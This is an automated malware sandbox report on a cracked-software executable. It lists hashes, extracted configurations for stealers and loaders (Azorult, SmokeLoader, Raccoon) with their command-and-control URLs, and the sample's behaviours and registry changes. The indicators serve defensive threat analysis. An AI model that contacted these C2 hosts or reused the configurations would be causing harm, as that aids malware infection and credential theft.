Analysis
-
max time kernel
45s -
max time network
587s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
03/04/2021, 07:46
Static task
static1
Behavioral task
behavioral1
Sample
Tekla_Structures_Extension_crack.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Tekla_Structures_Extension_crack.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Tekla_Structures_Extension_crack.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Tekla_Structures_Extension_crack.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
Tekla_Structures_Extension_crack.exe
Resource
win7v20201028
General
-
Target
Tekla_Structures_Extension_crack.exe
-
Size
5.4MB
-
MD5
baad366f257529076340afc66d1ac59c
-
SHA1
3dafcc431b85bd6a527e70879137e1f27e160849
-
SHA256
3f5a92454d1b626e24016329a9de52e40d78aae1e5977f53e820a2e2812d3975
-
SHA512
98d2e5ace89934ebc193ae6b8277b363d9d197a54bbcf6dfa3f40df2671d89c87e4d13737ea99eceb9a2a1ac3bd135ffa53d555f93f72ff2a36f1874cb94dd85
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral3/memory/5340-209-0x0000000002480000-0x0000000002D8A000-memory.dmp family_glupteba behavioral3/memory/5340-212-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral3/memory/5340-210-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 8 IoCs
resource yara_rule behavioral3/memory/5728-192-0x00000001402CA898-mapping.dmp xmrig behavioral3/memory/5728-188-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/5728-202-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/5728-243-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/10160-837-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/10160-901-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/11744-947-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/11744-1037-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 10 IoCs
pid Process 904 keygen-pr.exe 1408 keygen-step-1.exe 4056 keygen-step-3.exe 3888 keygen-step-4.exe 2028 key.exe 4060 Setup.exe 204 multitimer.exe 3568 setups.exe 2312 setups.tmp 1504 askinstall20.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 2312 setups.tmp 2312 setups.tmp 2312 setups.tmp 2312 setups.tmp 2312 setups.tmp 2312 setups.tmp 2312 setups.tmp -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 13 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 196 ip-api.com 208 api.ipify.org 293 ipinfo.io 344 ip-api.com 499 api.ipify.org 598 ipinfo.io 86 api.ipify.org 149 ipinfo.io 151 ipinfo.io 296 ipinfo.io 530 api.ipify.org 568 ipinfo.io 575 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 tapinstall.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 15 IoCs
pid pid_target Process procid_target 14936 6028 WerFault.exe 140 16356 6012 WerFault.exe 181 16652 6012 WerFault.exe 181 16996 6012 WerFault.exe 181 17320 6012 WerFault.exe 181 17540 6012 WerFault.exe 181 17788 6012 WerFault.exe 181 19280 6012 WerFault.exe 181 6588 6012 WerFault.exe 181 8240 6012 WerFault.exe 181 9452 6012 WerFault.exe 181 9768 6012 WerFault.exe 181 10296 6012 WerFault.exe 181 10516 6012 WerFault.exe 181 12896 19304 WerFault.exe 252 -
Delays execution with timeout.exe 6 IoCs
pid Process 9572 timeout.exe 11432 timeout.exe 6232 timeout.exe 18012 timeout.exe 19200 timeout.exe 19224 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS tapinstall.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer tapinstall.exe -
Kills process with taskkill 9 IoCs
pid Process 4152 taskkill.exe 5136 taskkill.exe 4200 taskkill.exe 5104 taskkill.exe 5968 taskkill.exe 7340 taskkill.exe 9944 taskkill.exe 6932 taskkill.exe 19256 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000f21deb89ec8c2f30e4ebcdb7cfca5f4f523a53e4c0c7ad1d818b6f2747fc65cdfb75bfa3d7a42c524a44e8d383951e679afd9b655c92352b7b9e MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "5" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{8762DEE4-604B-4BB6-8A30-AE87F33657C8}" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000073532dc26b3022be0134da6b34525e5323787d0a4c920d9dd89fc47a7663d9a96055adea44cb090a5e8493e139052ee37c7ee784921f76b676176c892d9d3c98f4c7f2581c13108214cc39ed82cd08385a456baf6f6a400d985712038a7bc5a4294b55d9c72809c67cadbd990ccb9d689f6d5e99e69113821101611e901f72b11380c4458a2a13e125c722fe541d1a6bc796ae7e6eb6d80010b37b3a3fa8fc2fba05f085dc390d4176bacf6caae48ad4dc60c390b3f72623d20eabfc64361cd3547c53a3b7751d80c22587e38240d6e4566c2dd138768fa164b3f801d9e853783a84b2ebe0fef4fc9faa7a79695275e27e58d6fd06525693b1400f1ab0e04771b3bc1322aaf4aa42c5e8f20800380dc617c56689b4aaa67d3657f6180f3d671775c6d3c3db77bc40ca7fbe8cdf13093be25349a665a0b735e0960431231f28af3c41025887a76157e60ff706650421e7d4a22263ca52c1919b9e68e97ba67ba08dcc02d68da4e429303831f537290809ba52f2d243e27be72310e891a2f1fdf420091513bf8e594c069a8a59e9a389660504b946a06e225dc3de462adb0dce798da1256ce1e1 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 6c3a3b6c55add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 6d0061395d28d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081